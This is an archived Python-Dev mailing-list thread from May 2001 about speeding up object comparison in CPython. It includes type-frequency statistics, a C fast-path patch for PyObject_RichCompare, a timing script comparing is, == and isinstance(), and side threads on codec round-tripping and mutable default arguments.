--Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Tue May 15 22:59:56 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 22:59:56 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> > Of course. But except for instance objects, answering "does the type > implement tp_richcompare?" is one lousy pointer check Almost - you also have to check the type flag. > and the answer will usually be-- provided we don't start stuffing > code into *every* object's tp_richcompare slot! --"no, so I can go > to tp_compare immediately". Coercions and richcmps are the oddball > cases today. I'd like to add another data point, answering the question what types are most frequently compared. The first set of data is for running the Python testsuite. riches 3040952 # Calls to PyType_RichCompare eqs 2828345 # Calls where the types are equal String 2323122 Float 141507 Int 125187 Type 99477 Tuple 84503 Long 30325 Unicode 10782 Instance 9335 List 2997 None 383 Class 318 Complex 219 Dict 57 Array 49 WeakRef 34 Function 11 File 11 SRE_Pattern 10 CFunction 9 Lock 8 Module 1 So strings cover 82% of all the compare calls of equally-typed objects, followed by floats with 5%. Those calls together cover 93% of the richcompare calls. Since this might give a blurred view of what is actually used in applications, I ran the PyXML testsuite with that python binary also. Leaving out types that are not used, I get riches 88465 eqs 59279 String 48097 Int 5681 Type 3170 Tuple 760 List 492 Float 332 Instance 269 Unicode 243 None 225 SRE_Pattern 4 Long 3 Complex 3 The first observation here is that "only" 67% of the calls are with equally-typed objects. Of those, 80% are with strings, 9% with integers. The last example is idle, where I just did an "import httplib", for fun. 
riches 50923 eqs 49882 String 31198 Tuple 8312 Type 7978 Int 1456 None 600 SRE_Pattern 210 List 122 Instance 4 Float 1 Instance method 1 Roughly the same picture: 97% calls with equally-typed objects, of those 62% strings, 3% integers. Notice the 15% for tuples and types, each. So to speed-up the common case clearly means to speed-up string comparisons. If I'd need to optimize anything else afterwards, I'd look into type objects - most likely, they are compared for EQ, which can be done nicely and directly in a tp_richcompare also. Those two optimizations together would give a richcompare to 95% of the objects in the IDLE case. Regards, Martin From guido at digicool.com Wed May 16 00:41:12 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 17:41:12 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200." <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com> I'm curious where the frequent comparisons of types come from. Is there lots of code that does frequent assert type(x) == T typechecking? Does isinstance(x, T) perhaps use EQ? --Guido van Rossum (home page: http://www.python.org/~guido/) From barry at digicool.com Tue May 15 23:51:00 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Tue, 15 May 2001 17:51:00 -0400 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> Message-ID: <15105.42180.401918.223487@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> I'm curious where the frequent comparisons of types come GvR> from. GvR> Is there lots of code that does frequent GvR> assert type(x) == T GvR> typechecking? GvR> Does isinstance(x, T) perhaps use EQ? Not to mention the several hundred comparisons to None. 
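Martin's percentages can be re-derived from his raw counts. The sketch below uses the test-suite figures; only the numbers come from the message, and the variable names are illustrative. It suggests that the 93% figure is the same-type share of all rich-compare calls, while strings and floats together make up about 81% of all calls:

```python
# Counts from Martin's test-suite run (PyObject_RichCompare instrumentation).
riches = 3040952   # all rich-compare calls
eqs = 2828345      # calls where both operands had the same type
by_type = {"String": 2323122, "Float": 141507, "Int": 125187}

def pct(part, whole):
    """Percentage of `whole` represented by `part`."""
    return 100.0 * part / whole

print(f"same-type share of all calls: {pct(eqs, riches):.1f}%")
for name, n in by_type.items():
    print(f"{name} share of same-type calls: {pct(n, eqs):.1f}%")
print(f"String+Float share of all calls: "
      f"{pct(by_type['String'] + by_type['Float'], riches):.1f}%")
```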
From jeremy at digicool.com Tue May 15 19:26:54 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 15 May 2001 13:26:54 -0400 (EDT) Subject: [Python-Dev] Comparison speed In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> Message-ID: <15105.26334.610144.846269@slothrop.digicool.com> I only learned recently that isinstance() can be called with types instead of classes. I suppose the name led me in the wrong direction. I had the silly idea that it only applied to instances <0.1 wink>. So it comes as little surprise to me that there is a lot of code executed in, e.g., the test suite that does comparisons on types. In the Lib directory, there are 63 files that use == and the builtin type function. (Simple grep.) A total of 139 instances of this idiom. A cursory scan suggests that most of the calls are things like type(obj) == type(''). In the Zope source tree, there are 58 files and 98 individual occurrences. It again looks like comparisons against the string type are the most common. I can think of two common cases where an object is checked against the string type. One is an interface that takes a file-like object or its path. The other is an interface that takes a sequence, but doesn't want to try a string as a sequence. Sounds like we ought to do a search-and-destroy on type comparisons, replacing with isinstance() where possible.
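The idioms discussed here differ in more than speed. `type(obj) == T` and `type(obj) is T` reject subclasses, while `isinstance()` accepts them. Below is a small Python 3 sketch in which `str` stands in for the old `types.StringType` and `MyStr` is a made-up subclass. The timing part uses `timeit` rather than a hand-written `time.time()` loop, and the numbers it prints will vary by interpreter and machine:

```python
import timeit

class MyStr(str):
    """A hypothetical str subclass, used only to show the semantic difference."""

def by_eq(obj):
    return type(obj) == str       # the type(obj) == type('') idiom

def by_is(obj):
    return type(obj) is str       # identity test on the type object

def by_isinstance(obj):
    return isinstance(obj, str)   # also accepts subclasses

plain, sub = "hello", MyStr("hello")
for check in (by_eq, by_is, by_isinstance):
    print(check.__name__, check(plain), check(sub))

# Rough timing only; results depend on interpreter version and hardware.
for stmt in ("type(x) is str", "type(x) == str", "isinstance(x, str)"):
    seconds = timeit.timeit(stmt, globals={"x": plain}, number=200_000)
    print(f"{stmt:20s} {seconds:.4f} s per 200k checks")
```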
Jeremy From jeremy at digicool.com Tue May 15 19:41:58 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 15 May 2001 13:41:58 -0400 (EDT) Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online In-Reply-To: <20010515115120.A14357@glacier.fnational.com> References: <000901c0dd6b$cdb5d960$e46940d5@hagrid> <20010515115120.A14357@glacier.fnational.com> Message-ID: <15105.27238.582785.851371@slothrop.digicool.com> I downloaded one of the files, but the QuickTime player I have on my Windows box said it didn't understand the file format. I eventually got the streaming version at the 100kbps to "work" where work meant mostly an audio feed and occasional stills that were recognizable. Jeremy PS It was cool to watch the one on compilation. Mat Hostetter, one of the panelists, is my old roommate! From barry at digicool.com Wed May 16 00:56:10 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Tue, 15 May 2001 18:56:10 -0400 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> Message-ID: <15105.46090.203278.397835@anthem.wooz.org> >>>>> "JH" == Jeremy Hylton writes: JH> I only learned recently that isinstance() can be called with JH> types instead of classes. I suppose the name led me in the JH> wrong direction. I had the silly idea that it only applied to JH> instances <0.1 wink>. JH> So it comes as little surprise to me that there is a lot of JH> code executed in, e.g., the test suite that does comparisons JH> on types. JH> In the Lib directory, there are 63 files that use == and the JH> builtin type function. (Simple grep.) A total of 139 JH> instances of this idiom. A cursory scan suggests that most of JH> the calls are things like type(obj) == type('').
Even without the forward-looking insight that types are classes, I think type comparisons should have been done with `is' and not ==. So old school type comparisons should have been done as

    type(obj) is StringType

whereas new school type comparisons should be done as

    isinstance(obj, StringType)

With Python 2.1, == is naturally slower than `is', but isinstance() comes in somewhere in the middle.

563897.802881 is comparisons per second
506827.201066 == comparisons per second
520696.916088 isinstance() comparisons per second

-Barry
-------------------- snip snip --------------------
from types import StringType
import time

r = range(1000000)

def one(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) is StringType
    t1 = time.time() - t0
    print len(r) / t1, 'is comparisons per second'

def two(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) == StringType
    t1 = time.time() - t0
    print len(r) / t1, '== comparisons per second'

def three(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        isinstance(x, StringType)
    t1 = time.time() - t0
    print len(r) / t1, 'isinstance() comparisons per second'

one()
two()
three()
From tim.one at home.com Wed May 16 01:49:03 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 19:49:03 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> Message-ID: Making the 5am email concrete, this is what I meant: Index: object.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v retrieving revision 2.131 diff -c -r2.131 object.c *** object.c 2001/05/11 03:36:45 2.131 --- object.c 2001/05/15 23:39:24 *************** *** 835,841 **** } } else { ! res = do_richcmp(v, w, op); } compare_nesting--; return res; --- 835,863 ---- } } else { ! cmpfunc f; ! if (v->ob_type == w->ob_type ! && RICHCOMPARE(v->ob_type) == NULL ! && (f = v->ob_type->tp_compare) != NULL) ! { ! int c = (*f)(v, w); !
if (c < 0 && PyErr_Occurred()) ! res = NULL; ! else { ! switch (op) { ! case Py_LT: c = c < 0; break; ! case Py_LE: c = c <= 0; break; ! case Py_EQ: c = c == 0; break; ! case Py_NE: c = c != 0; break; ! case Py_GT: c = c > 0; break; ! case Py_GE: c = c >= 0; break; ! } ! res = c ? Py_True : Py_False; ! Py_INCREF(res); ! } ! } ! else ! res = do_richcmp(v, w, op); } compare_nesting--; return res; That's a local change to PyObject_RichCompare, taking a fast path for most scalar types (which don't have richcmps but do have tp_compare today). On my Win98 box reproducible timings are impossible, but it obviously chops out layers and layers of function calls and redundant tests when it triggers. That appears to be more often than not across all apps I've tried, from 60% of PyObject_RichCompare calls to nearly 100%. From tim.one at home.com Wed May 16 02:01:05 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 20:01:05 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com> Message-ID: [Tim] > BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, > because it won't believe there's any difference unless Py_EQ > returns false for some corresponding elements: > > >>> class C: > ... def __lt__(x, y): return 1 > ... __eq__ = __lt__ > ... > >>> C() < C() > 1 > >>> (C(),) < (C(),) > 0 > >>> > > That doesn't make sense -- provided you believe the defn. of C > makes sense. [Guido] > I think in this example the problem is with C, not with the tuple > algorithm. I can live with that. > The question is, what are you going to do otherwise? You > could test for < first, == second -- but that means twice as many > comparisons, and for reasonably-behaved items it makes no difference > at all. The question remaining is how much of this list/tuple richcmp behavior is guaranteed by the language and how much is just implementation-dependent fuzz. 
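The `switch` in Tim's patch turns one three-way `tp_compare` result into the answer for a single rich operator. The cmp() complaint later in this thread concerns the opposite direction. Below is a Python sketch of both translations. The function names are hypothetical, the string keys stand in for Py_LT and the other opcodes, and raising when no test succeeds is a simplification of this sketch, not the 2001 fallback behaviour:

```python
import operator

# Map each rich-comparison opcode to a test on a three-way result c
# (c < 0: less, c == 0: equal, c > 0: greater), mirroring the patch's switch.
FROM_THREE_WAY = {
    "lt": lambda c: c < 0,
    "le": lambda c: c <= 0,
    "eq": lambda c: c == 0,
    "ne": lambda c: c != 0,
    "gt": lambda c: c > 0,
    "ge": lambda c: c >= 0,
}

def rich_from_three_way(c, op):
    """Answer one rich comparison from a single three-way result."""
    return FROM_THREE_WAY[op](c)

def three_way_from_rich(a, b):
    """Emulate cmp() on top of rich comparisons.

    Tries ==, then <, then >, so one cmp() may cost up to three
    rich-comparison calls. Returns (result, calls_made).
    """
    calls = 0
    for test, result in ((operator.eq, 0), (operator.lt, -1), (operator.gt, 1)):
        calls += 1
        if test(a, b):
            return result, calls
    raise TypeError("operands have no ordering")  # simplification of this sketch

print(rich_from_three_way(-1, "le"))      # True
print(three_way_from_rich("abc", "abd"))  # (-1, 2)
print(three_way_from_rich("abd", "abc"))  # (1, 3)
```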
For a more vanilla example, I removed the EQ/NE "lengths differ?" tuple richcmp early-exit test because I never found code that made it trigger (but tons of code that gets there without triggering). But this has semantic implications too: an implementation without the early exit may call user-defined comparison routines that raise exceptions when comparing tuples of different lengths now. Do you care? (I don't.) From tim.one at home.com Wed May 16 02:37:56 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 20:37:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > I'd like to add another data point, answering the question what types > are most frequently compared. That varies wildly by app. I have apps where int compares *overwhelmingly* dominate, others where float compares do, many where string compares do, and the last code I wrote for Zope spends most of its (very substantial) time doing lookups of "object ids" in dicts. In Python terms, those are Pythong lon (unbounded) ints today, and potentially Python ints on 64-bit boxes, and that's another case where ceval.c's special-casing of int compares is impotent. Heck, sort a large homogeneous array once, and whatever element type that array has will likely dominate comparisons for the whole app! That's why I'm so keen to chop out a half dozen layers of blubber for *all* types that don't play the richcmp game (which today includes every type I mentioned above). > The first set of data is for running the Python testsuite.
> > riches 3040952 # Calls to PyType_RichCompare > eqs 2828345 # Calls where the types are equal > > String 2323122 > Float 141507 > Int 125187 > Type 99477 > Tuple 84503 > Long 30325 > Unicode 10782 > Instance 9335 > List 2997 > None 383 > Class 318 > Complex 219 > Dict 57 > Array 49 > WeakRef 34 > Function 11 > File 11 > SRE_Pattern 10 > CFunction 9 > Lock 8 > Module 1 > > So strings cover 82% of all the compare calls of equally-typed > objects, followed by floats with 5%. Those calls together cover 93% of > the richcompare calls. > > Since this might give a blurred view of what is actually used in > applications, Note that the top 4 types don't have a tp_richcompare slot today. The tuples are likely composed of simple scalar types, and the latter benefit too. But as above, we can't say anything in advance about the *specific* types a given app is going to compare most often. There is no "typical app" in that respect. > I ran the PyXML testsuite with that python binary > also. Leaving out types that are not used, I get > > riches 88465 > eqs 59279 > > String 48097 > Int 5681 > Type 3170 > Tuple 760 > List 492 > Float 332 > Instance 269 > Unicode 243 > None 225 > SRE_Pattern 4 > Long 3 > Complex 3 > > The first observation here is that "only" 67% of the calls are with > equally-typed objects. Someone who cares about the speed of PyXML would be well advised to figure out why <0.9 wink>: there's no scheme on the horizon that will speed mixed-type comparisons one whit. > Of those, 80% are with strings, 9% with integers. XML is a string-crunching app, right? > The last example is idle, where I just did an "import httplib", for > fun. > > riches 50923 > eqs 49882 > > String 31198 > Tuple 8312 > Type 7978 > Int 1456 > None 600 > SRE_Pattern 210 > List 122 > Instance 4 > Float 1 > Instance method 1 > > Roughly the same picture: 97% calls with equally-typed objects, of > those 62% strings, 3% integers. Notice the 15% for tuples and types, > each. Surprising! 
> So to speed-up the common case clearly means to speed-up string > comparisons. The only thing the apps I've tried have in common is that the types compared most often do have tp_compare but not tp_richcompare functions. The test suite, XML and IDLE are all heavy string-slingers. > If I'd need to optimize anything else afterwards, I'd look into type > objects - most likely, they are compared for EQ, which can be done > nicely and directly in a tp_richcompare also. Would do just as well to give them a one-liner tp_compare function (in conjunction with the posted patch). > Those two optimizations together would give a richcompare to 95% of > the objects in the IDLE case. Since that's the exact opposite of what I want to do, it's at least interesting. Whatever, there needs to be a (very) fast path, and it needs to pick on something that all common types implement, including at least strings, ints, longs, floats and-- I guess --type objects. I don't know about other people, but I have lots of code that uses the cmp() function heavily. That path has also gotten bloated, and tries each of Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them to say "yes". It does this now even if the tp_compare slot is defined. The only thing that's saving cmp()-slinging code from major sloth now is that the basic types do *not* implement tp_richcompare, so try_rich_to_3way_compare gets out early (before doing the three-way Py_EQ etc dance). But give the basic scalar types richcmp functions, and cmp() will slow down a lot (unless more hacks are added to stop that). From greg at cosc.canterbury.ac.nz Wed May 16 03:58:05 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 16 May 2001 13:58:05 +1200 (NZST) Subject: [Python-Dev] Comparison speed In-Reply-To: Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz> Tim Peters : > In Python terms, those are Pythong lon (unbounded) ints today ^^^^^^^ What Pythonistas wear on their feet?
Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From esr at thyrsus.com Wed May 16 04:27:38 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Tue, 15 May 2001 22:27:38 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200 References: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz> Message-ID: <20010515222738.A9996@thyrsus.com> Greg Ewing : > Tim Peters : > > > In Python terms, those are Pythong lon (unbounded) ints today > ^^^^^^^ > What Pythonistas wear on their feet? No, man. It's what sexy lady Pythonistas wear on the beach in Rio. (Yes, I know some sexy lady Pythonistas. No, you can't have their phone numbers. Pthfthfthpht...) -- Eric S. Raymond Question with boldness even the existence of a God; because, if there be one, he must more approve the homage of reason, than that of blindfolded fear.... Do not be frightened from this inquiry from any fear of its consequences. If it ends in the belief that there is no God, you will find incitements to virtue in the comfort and pleasantness you feel in its exercise... -- Thomas Jefferson, in a 1787 letter to his nephew From tim.one at home.com Wed May 16 09:14:25 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 03:14:25 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3B00E98E.1C44FF5@lemburg.com> Message-ID: [MAL] > Round-tripping is obviously very important if you use Unicode > as basis for working on text. Since I use 7-bit ASCII exclusively, I've been using encode = decode = lambda x: x I haven't proved that's round-trippable, but haven't bumped into an exception yet. 
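MAL's round-trip requirement for charmap codecs (decode every byte value, encode the result back, and get the same byte) can be checked mechanically. The sketch below uses a made-up four-entry decoding map in which two bytes decode to U+001A, the situation described for cp875. The helper names are hypothetical. Mapping a duplicated target to None follows the approach MAL proposes later in this thread:

```python
def build_encoding_map(decoding_map):
    """Invert a byte -> code point map; targets hit more than once map to None."""
    enc = {}
    for byte, cp in decoding_map.items():
        enc[cp] = None if cp in enc else byte
    return enc

def round_trip_failures(decoding_map):
    """Return the byte values that do not survive decode -> encode."""
    enc = build_encoding_map(decoding_map)
    return sorted(b for b, cp in decoding_map.items() if enc.get(cp) != b)

# Toy map (not the real cp875 table): 0x3F and 0xFF both decode to U+001A.
toy = {0x41: 0x0041, 0x42: 0x0042, 0x3F: 0x001A, 0xFF: 0x001A}
print(round_trip_failures(toy))   # [63, 255]
```

With the duplicate target mapped to None, an encoder that treats None as "undefined" raises an error instead of silently choosing one of the two bytes.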
> I don't know about the reasoning behind making cp875 fail the > round-trip -- Unicode certainly provides means to make mappings > round-trip safe (e.g. by reverting to the private Unicode > char. point areas). Then I ignorantly but confidently (indeed, with the cheery confidence only the truly ignorant can truly enjoy!) vote for your approach that maps the non-round-trippable cp875 code points to None. Better safe than sorry, by default. Else 6 of the 7 ambiguous chars will be silent surprises by default. From tim.one at home.com Wed May 16 09:25:28 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 03:25:28 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151527.KAA28734@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > PEP 207 is quite explicit that == and != are not to be assumed each > other's complement. It is silent on the x==x issue but the PEP > mentions IEEE 754 so I agree that this also shouldn't be cut short. It's explicit about x==x too: (Note: Python currently assumes that x==x is always true and x!=x is never true; this should not be assumed.) That's from the end of point #4, under "Proposed Resolutions". I agreed then, and still do. From martin at loewis.home.cs.tu-berlin.de Wed May 16 09:28:45 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 09:28:45 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT)) References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> > Sounds like we ought to do a search-and-destroy on type comparisons, > replacing with isinstance() where possible.
At least in my applications, this is unfortunately not possible: I want a test for byte-string-or-unicode-string. This could be done with two isinstance calls, but that is certainly less efficient. Marc-Andre once proposed a type representing the immediate supertype of both byte strings and unicode strings; let's call it abstract string. Then I could write isinstance(e, types.AbstractString). Regards, Martin From martin at loewis.home.cs.tu-berlin.de Wed May 16 09:24:56 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 09:24:56 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com) References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.42180.401918.223487@anthem.wooz.org> Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de> > GvR> I'm curious where the frequent comparisons of types come > GvR> from. > > Not to mention the several hundred comparisons to None. This is harder to analyse; I set a gdb breakpoint on the place where RichCompare gets PyType_Type, then tried to see what it does, then ignored the breakpoint a few times. This is what I've found; I may have missed important cases. In PyXML, the expression type(e) in [types.StringType, types.UnicodeType] is frequently computed. This is a sequence_contains, which in turn does two Py_EQ tests. In addition, compile.c:com_add has t = Py_BuildValue("(OO)", v, v->ob_type) PyDict_GetItem(dict, t) Again, the dictionary lookup performs Py_EQ on the tuples, which does Py_EQ on the elements. This also accounts for the RichCompare calls which receive None: v may be None, here, so t is (None, type(None)). In IDLE, the situation is similar. com_add produces many compares with types. In addition, sre.compile has type(s) in sre_compile.STRING_TYPES which is the same test as the PyXML one.
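For the byte-string-or-Unicode test, `isinstance()` also accepts a tuple of types, which replaces two calls with one. That tuple form arrived in Python 2.2, after this thread. The membership idiom differs in one more way: it rejects subclasses. Below is a Python 3 sketch in which the pair becomes `bytes` and `str`. `STRING_TYPES` echoes the sre_compile name but is defined here for illustration, and `Tag` is a hypothetical subclass:

```python
STRING_TYPES = (bytes, str)  # illustrative Python 3 analogue of (StringType, UnicodeType)

def is_string_by_membership(e):
    # The PyXML/sre idiom: compares type(e) against each entry in turn.
    return type(e) in STRING_TYPES

def is_string_by_isinstance(e):
    # One call; also accepts subclasses of bytes or str.
    return isinstance(e, STRING_TYPES)

class Tag(str):
    """Hypothetical str subclass."""

for value in (b"abc", "abc", Tag("abc"), 42):
    print(repr(value), is_string_by_membership(value), is_string_by_isinstance(value))
```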
Finally, there is a type-in-typetuple test inside Tkinter._cnfmerge. Regards, Martin From i_sofer at yahoo.com Wed May 16 09:53:25 2001 From: i_sofer at yahoo.com (Idan Sofer) Date: 16 May 2001 10:53:25 +0300 Subject: [Python-Dev] Bug report: empty dictionary as default class argument Message-ID: <200105160756.KAA29616@alpha.netvision.net.il> Hello. I have found a rather annoying bug in Python, present in both Python 1.5 and Python 2.0. If a class has an argument with a default of an empty dictionary, then all instances of the same class will point to the same dictionary, unless the dictionary is explicitly defined by the constructor. I attach a piece of code that demonstrates the problem. -------------- next part -------------- A non-text attachment was scrubbed... Name: test.py Type: text/x-python Size: 1197 bytes Desc: not available URL: From martin at loewis.home.cs.tu-berlin.de Wed May 16 10:02:01 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 10:02:01 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de> > Since that's the exact opposite of what I want to do, it's at least > interesting. I'll put a patch on SF soon which does what you want to do, i.e. tries tp_compare as the first thing if tp_richcompare is not there. Even with this patch, your code is faster if strings have a richcompare. Without richcompare, I get 0.720 0.720 0.720 0.730 0.720 0.720 0.730 0.720 0.720 0.730 With it, I get 0.710 0.720 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720 Given that stock CVS python is in the 0.78 range, the difference is negligible, though.
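The behaviour Idan reports follows from default values being evaluated once, when the `def` statement runs. Below is a Python 3 sketch that reproduces it and shows the usual `None`-sentinel fix; the class names are made up. Testing `attribs is None` rather than writing `attribs or {}` keeps a caller-supplied empty dict instead of silently replacing it:

```python
class Shared:
    def __init__(self, attribs={}):     # one dict, created when `def` runs
        self.attribs = attribs

class Fresh:
    def __init__(self, attribs=None):   # sentinel: build a new dict per call
        self.attribs = {} if attribs is None else attribs

a, b = Shared(), Shared()
a.attribs["colour"] = "red"
print(b.attribs)                    # {'colour': 'red'}: both share one dict

c, d = Fresh(), Fresh()
c.attribs["colour"] = "red"
print(d.attribs)                    # {}

mine = {}
print(Fresh(mine).attribs is mine)  # True: an explicit empty dict is kept
```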
Regards, Martin From larsga at garshol.priv.no Wed May 16 10:19:10 2001 From: larsga at garshol.priv.no (Lars Marius Garshol) Date: 16 May 2001 10:19:10 +0200 Subject: [Python-Dev] Bug report: empty dictionary as default class argument In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il> References: <200105160756.KAA29616@alpha.netvision.net.il> Message-ID: * Idan Sofer | | If a class has an argument with a default of an empty dictionary, | then all instances of the same class will point to the same | dictionary, unless the dictionary is explicitly defined by the | constructor. This is part of the language semantics, and so not a bug. The default values of optional arguments are evaluated when the function/method is defined, not on each call. You may consider the semantics ill-advised, but it is intentional. | class foo: | | def __init__(self,attribs={}): | self.attribs=attribs; | return None; I usually write this as: class Foo: def __init__(self, attribs = None): self.attribs = attribs or {} --Lars M. From fredrik at pythonware.com Wed May 16 10:18:44 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 16 May 2001 10:18:44 +0200 Subject: [Python-Dev] Bug report: empty dictionary as default class argument References: <200105160756.KAA29616@alpha.netvision.net.il> Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff> Idan Sofer wrote: > > I have found a rather annoying bug in Python, present in both Python 1.5 > and Python 2.0. > > If a class has an argument with a default of an empty dictionary, then > all instances of the same class will point to the same dictionary, > unless the dictionary is explicitly defined by the constructor. maybe you should check the documentation (or the FAQ) before submitting bugs? http://www.python.org/doc/current/ref/function.html Default parameter values are evaluated when the function definition is executed.
This means that the expression is evaluated once, when the function is defined, and that that same ``pre- computed'' value is used for each call. This is especially important to understand when a default parameter is a mutable object, such as a list or a dictionary: if the function modifies the object (e.g. by appending an item to a list), the default value is in effect modified. Cheers /F PS. when you do report real bugs, please use the bug tracker: http://sourceforge.net/tracker/?group_id=5470&atid=105470 "is this a bug" questions should be sent to comp.lang.python From tim.one at home.com Wed May 16 10:41:47 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:41:47 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> Message-ID: [Martin] > Producing numbers is easy :-) If only making sense of them were too <0.6 wink>. > I've instrumented my version where string implements richcmp, and > special-cases everything I can think of. 1. String objects are also equal despite being different objects, if their ob_sinterned pointers are equal and non-NULL. So if you're looking for every trick in & out of the book, that's another one. 2. But the real goal is to add only those special cases that in combination yield the largest net win, and that's much harder to determine (since there are no typical apps, and it's very hard to quantify the tradeoffs here in a credible x-platform x-app way). > Counting is done for running the test suite. With this, I get > > Calls to string_richcompare: 2378660 > Calls with different types: 33992 (ie. one is not a string) > Calls with identical strings: 120517 > Calls where lens decide !EQ: 1775716 > ---------------------------- > Calls richcmp -> oldcomp: 448435 > Total calls to oldcomp: 1225643 > Calls oldcomp -> memcmp: 860174 > > So 5% of the calls are with identical strings, for which I can > immediately decide the outcome. 
But also at the cost of doing a fruitless compare and branch in 95% of calls. There isn't enough data to guess whether this is a net win or a net loss (compared to leaving this special case out). Note that if the "identical string pointers" special case is a net win, it would be effective inside oldcomp instead (i.e., you don't need a richcompare slot to exploit it); indeed, it may be more effective there, since there are some 800,000 calls to oldcmp that *didn't* come from richcmp, and oldcmp doesn't check for pointer equality now (but PyObject_Compare does, so there didn't *used* to be any point to it in oldcmp). Any idea where those 800,000 virgin calls to oldcomp are coming from? That's a lot. > 75% can be decided in terms of the string lengths, which leaves ca. 19% > for cases where lexicographical comparison is needed. So about 1 in 5 times there's also the additional (wrt just calling oldcmp all the time) overhead of a second function call (i.e., the call to oldcmp made by richcmp). > In those cases, the first byte decides in 30%. If I remove the test > for "len decides !EQ", I get > > #riches: 2358322 > #riches_ni: 34108 > #idents_decide: 102050 > #lens_decide: 0 > -------------------------------------- > rest(computed): 2222164 > #comps: 2949421 > #memcmps: 917776 > > So still, ca. 30% can be decided by first byte. Sorry, I couldn't follow this part, except noting that 917776 is about 30% of 2949421, in which case I would have expected you to say that 70% can be decided by first byte. > It still appears that the total number of calls to memcmp is higher > when the length is not taken into consideration. Since 917776 is larger than the earlier 860174, isn't that plain? BTW, some compilers inline memcmp, so assuming it's "a call" is a x-platform trap; of course assuming it *isn't* is also a x-platform trap. 
